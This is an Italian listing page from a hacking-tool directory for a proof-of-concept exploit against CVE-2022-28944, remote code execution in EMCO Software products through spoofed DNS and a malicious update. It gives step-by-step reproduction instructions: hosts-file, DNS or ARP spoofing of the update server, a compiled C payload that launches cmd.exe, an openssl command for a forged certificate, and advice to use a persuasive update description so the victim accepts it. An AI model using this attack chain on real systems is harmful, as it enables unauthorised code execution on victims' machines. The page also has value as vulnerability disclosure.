Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2022-28944 — Exploit proof-of-concept per l'esecuzione remota di codice non autenticata nei prodotti EMCO Software tramite spoofing DNS e iniezione di aggiornamenti dannosi. | Kitploit
Strumenti/GitHubGitHub/gar-re/cve-2022-28944
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlStrumento di Accesso RemotoSviluppo Payload
GitHubgar-re/cve-2022-28944

cve-2022-28944

Exploit proof-of-concept per l'esecuzione remota di codice non autenticata nei prodotti EMCO Software tramite spoofing DNS e iniezione di aggiornamenti dannosi.

Vedi Repository
4133 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-28944

Vulnerabilità di esecuzione remota di codice in più prodotti EMCO Software tramite aggiornamento non autenticato.

Uso: python3 cve-2022-28944_poc.py

Dettagli nel report su gerr.re.

Passaggi per riprodurre

  1. Installare un prodotto interessato di EMCO Software;
  2. Impostare lo spoof di storage.emcosoftware.com verso l'IP dell'attaccante;
    • Per una proof-of-concept modificare c:\windows\system32\drivers\etc\hosts sul target.
      • Nota: gli attaccanti possono ad esempio usare:
        • router/switch/DNS mal configurati,
        • spoofing DNS / avvelenamento della cache,
        • spoofing ARP / avvelenamento della cache.
  3. Compilare proof.c sull'attaccante, ad esempio usando i686-w64-mingw32-gcc proof.c -o proof.exe;
root@kitploit:~
#include <windows.h> int main(int argc, char const *argv[]){ WinExec("cmd.exe",1); return TRUE; }
  1. Generare certificati autofirmati;
    • ad esempio usando openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"
  2. Eseguire lo script proof-of-concept;
  3. Avviare il prodotto interessato di EMCO Software e quindi
    • attendere un giorno per attivare l'aggiornamento automaticamente, oppure
    • attivare l'aggiornamento manualmente tramite il menu dell'applicazione;
  4. Accettare l'aggiornamento nella procedura guidata Update Wizard.
    • Gli attaccanti useranno una descrizione persuasiva dell'aggiornamento per convincere la vittima ad accettarlo.
Scarica lo strumento